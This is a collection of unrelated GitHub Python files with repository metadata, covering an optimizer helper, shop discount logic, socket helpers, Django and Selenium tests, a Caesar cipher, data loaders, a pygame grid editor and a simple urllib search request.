ADADELTA_MOMENTUM = 0.9
ADADELTA_WEIGHT_DECAY = 0.005
def get_adadelta_halnet(halnet,
momentum=ADADELTA_MOMENTUM,
weight_decay=ADADELTA_WEIGHT_DECAY,
learning_rate=ADADELTA_LEARNING_RATE):
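    """Build an Adadelta optimizer over the HALNet parameters.

    Note: the ADADELTA_MOMENTUM constant is passed as Adadelta's rho, i.e. the
    decay rate of the running average of squared gradients.
    """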
return optim.Adadelta(halnet.parameters(),
rho=momentum,
weight_decay=weight_decay,
lr=learning_rate)
| pauloabelha/muellerICCV2017 | optimizers.py | optimizers.py | py | 520 | python | pt | code | 2 | github-code | 36 |
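A hedged usage sketch for the helper above; the small nn.Linear module only stands in for the real HALNet model, whose definition lives elsewhere in the repository.

import torch
import torch.nn as nn

halnet = nn.Linear(10, 2)                 # stand-in for the real HALNet (assumption)
optimizer = get_adadelta_halnet(halnet)   # Adadelta with rho=0.9, lr=0.05, weight_decay=0.005

loss = halnet(torch.randn(4, 10)).sum()   # dummy forward pass and scalar loss
optimizer.zero_grad()
loss.backward()
optimizer.step()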
2530109965 | from typing import Tuple
from pricer.pricer import Offer, Basket, Catalogue
def multibuy(item: str, buy: int, get: int) -> Offer:
def offer(basket: Basket, catalogue: Catalogue) -> Tuple[float, Basket]:
basket = basket.copy()
if item not in basket or item not in catalogue:
return 0, basket
if basket[item] >= buy + get:
basket[item] -= (buy + get)
return buy * catalogue[item], basket
else:
return 0, basket
return offer
def discount(item: str, percent: int) -> Offer:
def offer(basket: Basket, catalogue: Catalogue) -> Tuple[float, Basket]:
basket = basket.copy()
if item not in basket or item not in catalogue:
return 0, basket
if basket[item] == 1:
basket.pop(item)
else:
basket[item] -= 1
return catalogue[item] * (100 - percent) / 100, basket
return offer
| zamkot/basket_pricer | pricer/offers.py | offers.py | py | 950 | python | en | code | 0 | github-code | 36 |
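A hedged usage sketch for the two offer factories above. It assumes Basket and Catalogue behave like plain dicts (item -> quantity and item -> unit price), which the .copy()/.pop() calls imply; items and prices are invented for illustration.

catalogue = {'apple': 0.50, 'soap': 2.00}
basket = {'apple': 4, 'soap': 1}

buy_three_get_one = multibuy('apple', buy=3, get=1)
ten_percent_off_soap = discount('soap', percent=10)

price, basket = buy_three_get_one(basket, catalogue)      # charges 1.50 and consumes 4 apples
price2, basket = ten_percent_off_soap(basket, catalogue)  # charges 1.80 and removes the soap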
31775295098 | """A module defining functions for playing multiplayer games"""
import abc
import socket
import os
import os.path
from . import base
def mk_server(game_name, player_name):
"""Returns a serer for a game"""
socket_name = ("/tmp/%s_%s_%s" % (game_name, player_name, os.getpid()))
if os.path.exists(socket_name):
os.remove(socket_name)
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind(socket_name)
server.listen(1)
conn, addr = server.accept()
return conn
def mk_client(socket_name):
"""Returns a client for a game"""
client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client.connect("/tmp/%s" % socket_name)
return client
| percivalgambit/gofish_multiplayer | pytermgame/multiplayer.py | multiplayer.py | py | 714 | python | en | code | 0 | github-code | 36 |
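A hedged sketch of how the two helpers above could be paired across two processes; the game and player names are placeholders, and the client must pass the server's socket file name without the /tmp/ prefix (it embeds the server's pid, so it has to be shared out of band).

# Process 1 (server): blocks in accept() until a client connects.
conn = mk_server('gofish', 'alice')        # binds /tmp/gofish_alice_<pid>
conn.sendall(b'hello')

# Process 2 (client): 12345 stands for the server's pid (assumption).
client = mk_client('gofish_alice_12345')
print(client.recv(1024))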
9689098423 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase, RequestFactory, Client
from app.tests.mixins import AuthRouteTestingWithKwargs
from app.tests.mixins import Pep8ViewsTests
import app.views as views
performance = views.user_performance_views
class UserPerformancePep8Tests(TestCase, Pep8ViewsTests):
def setUp(self):
self.path = 'app/views/users/performance/'
# /users/:user_id/performance(.:format) only accepts GET and POST
class UserPerformanceIndexRoutingTests(TestCase, AuthRouteTestingWithKwargs):
def setUp(self):
self.factory = RequestFactory()
self.client = Client()
self.route_name = 'app:user_performance_index'
self.route = '/users/10/performance'
self.view = performance.user_performance_index
self.responses = {
'exists': 200,
'GET': 200,
'POST': 200,
'PUT': 405,
'PATCH': 405,
'DELETE': 405,
'HEAD': 405,
'OPTIONS': 405,
'TRACE': 405
}
self.kwargs = {'user_id': 10}
self.expected_response_content = 'Performance History Visualization'
AuthRouteTestingWithKwargs.__init__(self)
| Contrast-Security-OSS/DjanGoat | app/tests/views/test_users_performance.py | test_users_performance.py | py | 1,247 | python | en | code | 69 | github-code | 36 |
34400546796 | from pages.courses.register_course_page import RegisterCoursePage
from utilities.test_status import TestStatus
from pages.home.login_page import LoginPage
import unittest
import pytest
from ddt import ddt, data, unpack
import time
from pages.home.navigation_page import NavigationPage
@pytest.mark.usefixtures("oneTimeSetUp", "setUp")
@ddt
class RegisterCourseTests(unittest.TestCase):
@pytest.fixture(autouse=True)
def objectSetup(self, oneTimeSetUp):
self.courses = RegisterCoursePage(self.driver)
self.ts = TestStatus(self.driver)
self.lp = LoginPage(self.driver)
self.nav = NavigationPage(self.driver)
def set_up(self):
self.nav.navigate_to_all_courses()
    @pytest.mark.run(order=1)
    @data(("JavaScript for beginners", "10", "1220", "10"), ("Learn Python 3 from scratch", "20", "1220", "20"))
@unpack
def test_invalid_enrollment(self, courseName, ccNum, ccExp, ccCVV):
self.lp.login("test@email.com", "abcabc")
self.courses.enter_search_field(courseName)
self.courses.click_search_button()
self.courses.select_course()
time.sleep(4)
self.courses.enroll_course(num=ccNum, exp=ccExp, cvv=ccCVV)
result = self.courses.verify_enroll_failed()
self.ts.mark_final("test_invalid_enrollment", result,
"Enrollment Verification")
self.courses.click_all_courses_link()
| dragosavac/Testing_Framework | tests/courses/course_test.py | course_test.py | py | 1,440 | python | en | code | 0 | github-code | 36 |
41120702108 | from default.liststc import length
__k = 3
def __get_ciphered_char(p: str):
    # check whether the char is an alphabetic letter
    if 97 <= ord(p) <= 122 or 65 <= ord(p) <= 90:
        # check whether the char is an uppercase letter
        is_upper_case = p.isupper()
        # convert the char to lowercase
        p = p.lower()
        # ASCII code of the first lowercase letter ('a')
        starting = 97
        # lowercase range = 97-122, uppercase range = 65-90
        # apply the cipher shift
p_p = abs(ord(p) - ord('a'))
num_p = (p_p + __k) % 26
final_num = starting + num_p
        # restore the original case (uppercase if the input was uppercase)
        return chr(final_num).upper() if is_upper_case else chr(final_num)
    # if the char is not an alphabetic letter, return it unchanged
    else:
        return p
# encode each character of the string using __get_ciphered_char
def cipher_string(text: str):
final_text = ""
for i in range(length(text)):
final_text += __get_ciphered_char(text[i])
return final_text
| zidane-itb/tubes-daspro | security/cipher.py | cipher.py | py | 1,054 | python | id | code | 0 | github-code | 36 |
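A quick usage check of the fixed-key (k = 3) Caesar shift above; non-alphabetic characters pass through unchanged.

print(cipher_string('Hello, Zoo!'))   # -> 'Khoor, Crr!'
print(cipher_string('abc XYZ 123'))   # -> 'def ABC 123'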
72653392105 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 2 15:17:31 2020
@author: PARK
"""
import numpy as np
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
def disease_load(val_rate = 0.25, seed = 42, target_split = True):
# Load Data
disease_data = pd.read_csv('./dataset/thyroid_disease/thyroid_disease.csv')
disease_data = disease_data[['Age', 'TSH', 'T3', 'TT4', 'T4U', 'FTI', 'class']]
disease_data['outlier'] = disease_data['class'].apply(lambda x: 0 if x == 3 else 1)
disease_data.drop(columns = 'class', inplace = True)
X = disease_data.drop(columns = 'outlier')
y = disease_data['outlier']
data_size = X.shape[0]
idx = np.arange(data_size)
split_size = int(val_rate * data_size)
np.random.seed(seed)
np.random.shuffle(idx)
tr_idx, val_idx = idx[split_size:], idx[:split_size]
X_train = X.iloc[tr_idx]
y_train = y.iloc[tr_idx]
X_val = X.iloc[val_idx]
y_val = y.iloc[val_idx]
if target_split == True:
return X_train, y_train, X_val, y_val
elif target_split == False:
X_train['label'] = y_train
X_val['label'] = y_val
return X_train, X_val
def tree_load(val_rate = 0.25, seed = 42, target_split = True):
# Load Data
tree_data = pd.read_csv('./dataset/forest_cover_type/covtype.csv')
label = tree_data['Cover_Type']
tree_data = tree_data.iloc[:, :10]
tree_data['Cover_Type'] = label
tree_data['outlier'] = tree_data['Cover_Type'].apply(lambda x: 1 if (x == 3) | (x == 4) | (x == 6) else 0)
tree_data.drop(columns = 'Cover_Type', inplace = True)
X = tree_data.drop(columns = 'outlier')
y = tree_data['outlier']
data_size = X.shape[0]
idx = np.arange(data_size)
split_size = int(val_rate * data_size)
np.random.seed(seed)
np.random.shuffle(idx)
tr_idx, val_idx = idx[split_size:], idx[:split_size]
X_train = X.iloc[tr_idx]
y_train = y.iloc[tr_idx]
X_val = X.iloc[val_idx]
y_val = y.iloc[val_idx]
if target_split == True:
return X_train, y_train, X_val, y_val
elif target_split == False:
X_train['label'] = y_train
X_val['label'] = y_val
return X_train, X_val | Yukkiasuna-sao/Anomaly_Detection | implementation/loaddata.py | loaddata.py | py | 2,300 | python | en | code | 0 | github-code | 36 |
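A hedged usage sketch for the loaders above; it assumes the thyroid CSV exists at the relative path hard-coded in disease_load and that the script is run from the repository root.

X_train, y_train, X_val, y_val = disease_load(val_rate=0.25, seed=42)
print(X_train.shape, y_train.mean())                  # feature matrix size and outlier rate

train_df, val_df = disease_load(target_split=False)   # single frames with a 'label' column
print(train_df.columns.tolist())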
39122782459 | from clases import *
personas = persona()
personas.setNombre("Rene")
personas.setApellidos("Franco")
personas.setAltura(178)
personas.setEdad(200)
print(f"La persona es {personas.getNombre()} {personas.getApellidos()} ")
informatica = informatico()
informatica.setNombre("Paquito")
informatica.setApellidos("Cabezon")
informatica.setAltura(160)
informatica.setEdad(30)
print(f"La persona es : {informatica.getNombre()} {informatica.getApellidos()} ")
| reneafranco/Course | POO-HERENCIAS/main.py | main.py | py | 456 | python | es | code | 0 | github-code | 36 |
41730576127 | # Create the grid
import numpy as np
import pygame
grid_size = 20
# The abstract representation of the grid.
# A nxn grid
grid = np.zeros((grid_size, grid_size))
pygame.init()
screen_width, screen_height = 600, 600
screen = pygame.display.set_mode((screen_width, screen_height))
clock = pygame.time.Clock()
class ClickableTile(pygame.sprite.Sprite):
def __init__(self, pos, size, state, position):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((size, size))
self.state = state
self.position = position
if self.state == 0:
self.image.fill('darkgrey')
else:
self.image.fill('white')
self.rect = self.image.get_rect(topleft=pos)
def on_click(self):
if self.state == 0:
self.image.fill('white')
self.state = 1
elif self.state == 1:
self.image.fill('darkgrey')
self.state = 0
class GridGenerator:
def __init__(self):
self.grid = np.zeros((grid_size, grid_size))
self.grid[-10:, :] = 1
self.setup_grid()
def setup_grid(self):
self.palette_group = pygame.sprite.Group()
p_tile = screen_width // grid_size
for i in range(grid_size):
for j in range(grid_size):
state = self.grid[i][j]
tile = ClickableTile(((j * p_tile), (i * p_tile)), p_tile - 1, state, position=(i, j))
self.palette_group.add(tile)
def update_grid(self):
for sprite in self.palette_group.sprites():
self.grid[sprite.position[0]][sprite.position[1]] = sprite.state
def print_grid(self):
print(self.grid)
def save_grid(self):
np.save('grid.npy', self.grid)
gridgenerator = GridGenerator()
# Define colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
pos = pygame.mouse.get_pos()
for sprite in gridgenerator.palette_group.sprites():
if sprite.rect.collidepoint(pos):
sprite.on_click()
gridgenerator.update_grid()
# print(gridgenerator.print_grid())
keys = pygame.key.get_pressed()
if keys[pygame.K_SPACE]:
print("saved")
gridgenerator.save_grid()
gridgenerator.palette_group.draw(screen)
# Update the display
pygame.display.update()
clock.tick(30)
pygame.display.flip()
# Quit the game
pygame.quit()
| crimsondevi/PathThroughDestruction | grid.py | grid.py | py | 2,736 | python | en | code | 0 | github-code | 36 |
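Reading back the file written when SPACE is pressed is a one-liner; a small hedged example:

import numpy as np

saved = np.load('grid.npy')            # 20x20 array of 0/1 tile states
print(int(saved.sum()), 'filled tiles')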
7020319772 | import urllib.request
import urllib.parse
kw = '日本'
data = {
'wd': kw
}
data = urllib.parse.urlencode(data)
url = 'https://www.baidu.com/s?' + data
headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'
}
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
#with open('haha.html', 'wb') as fp:
# fp.write(response.read())
with open('haha.html', 'w', encoding='utf-8') as fp:
fp.write(response.read().decode('utf-8')) | thearmada/spider | 3.py | 3.py | py | 527 | python | en | code | 0 | github-code | 36 |